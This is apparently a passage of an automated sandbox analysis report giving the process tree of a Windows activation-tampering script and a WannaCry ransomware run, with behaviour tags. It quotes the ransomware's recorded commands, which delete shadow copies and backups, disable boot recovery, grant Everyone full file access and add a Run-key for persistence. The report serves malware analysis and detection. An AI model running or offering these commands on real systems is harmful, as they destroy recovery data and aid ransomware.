    powershell.exe -c $acl = Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -AclObject $acl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -c $acl = Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP' -AclObject $acl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c $acl = Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP' -AclObject $acl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -c $acl = Get-Acl 'HKLM:\SYSTEM\CurrentControlSet\Services\SPPSVC'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SPPSVC' -AclObject $acl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c $acl = Get-Acl 'HKLM:\SYSTEM\CurrentControlSet\Services\SPPSVC'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SPPSVC' -AclObject $acl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -c $acl = Get-Acl 'HKLM:\SYSTEM\WPA'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SYSTEM\WPA' -AclObject $acl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c $acl = Get-Acl 'HKLM:\SYSTEM\WPA'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SYSTEM\WPA' -AclObject $acl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -c $acl = Get-Acl '%windir%\System32'; $rule = New-Object System.Security.AccessControl.FileSystemAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path '%windir%\System32' -AclObject $acl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c $acl = Get-Acl 'C:\Windows\System32'; $rule = New-Object System.Security.AccessControl.FileSystemAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'C:\Windows\System32' -AclObject $acl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -c $acl = Get-Acl '%windir%\System32\spp'; $rule = New-Object System.Security.AccessControl.FileSystemAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path '%windir%\System32\spp' -AclObject $acl
  2⤵
  PID:1752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c $acl = Get-Acl 'C:\Windows\System32\spp'; $rule = New-Object System.Security.AccessControl.FileSystemAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'C:\Windows\System32\spp' -AclObject $acl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c %windir%\IME\reset.bat
  2⤵
  PID:2904
- - C:\Windows\system32\net.exe
    net stop sppsvc
    3⤵
    PID:2256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sppsvc
      4⤵
      PID:316
- - C:\Windows\system32\net.exe
    net start sppsvc
    3⤵
    PID:4788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start sppsvc
      4⤵
      PID:5040
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Windows\System32\slmgr.vbs /rilc
    3⤵
    PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c %windir%\IME\activator.bat
  2⤵
  PID:972
- - C:\Windows\system32\timeout.exe
    timeout /T 3 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:5920

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbaf7046f8,0x7ffbaf704708,0x7ffbaf704718
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:4104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  PID:2552
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --service-sandbox-type=collections --mojo-platform-channel-handle=5236 /prefetch:8
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=6032 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1860 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
  2⤵
  PID:5992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
  2⤵
  PID:2652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
  2⤵
  PID:408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,3145462137417748019,17663624835651984425,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2192

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\WannaCry.EXE
"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\WannaCry.EXE"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5068
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:2856
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:2988
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 26511735737800.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5252
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5324
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - Views/modifies file attributes
  PID:5888
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5456
- - C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:5612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5448
- - C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5556
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:5772
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5740
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4100
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4908
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - Suspicious use of SetWindowsHookEx
  PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tvhpejndbjx409" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\tasksche.exe\"" /f
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tvhpejndbjx409" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2352
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1536
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5428
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2984
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3112
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1016
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1420
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5796
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5772
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:468
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5640
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3292
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5056
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4812
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1904
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1872
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2320
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5924
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1276
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4344
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4500
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
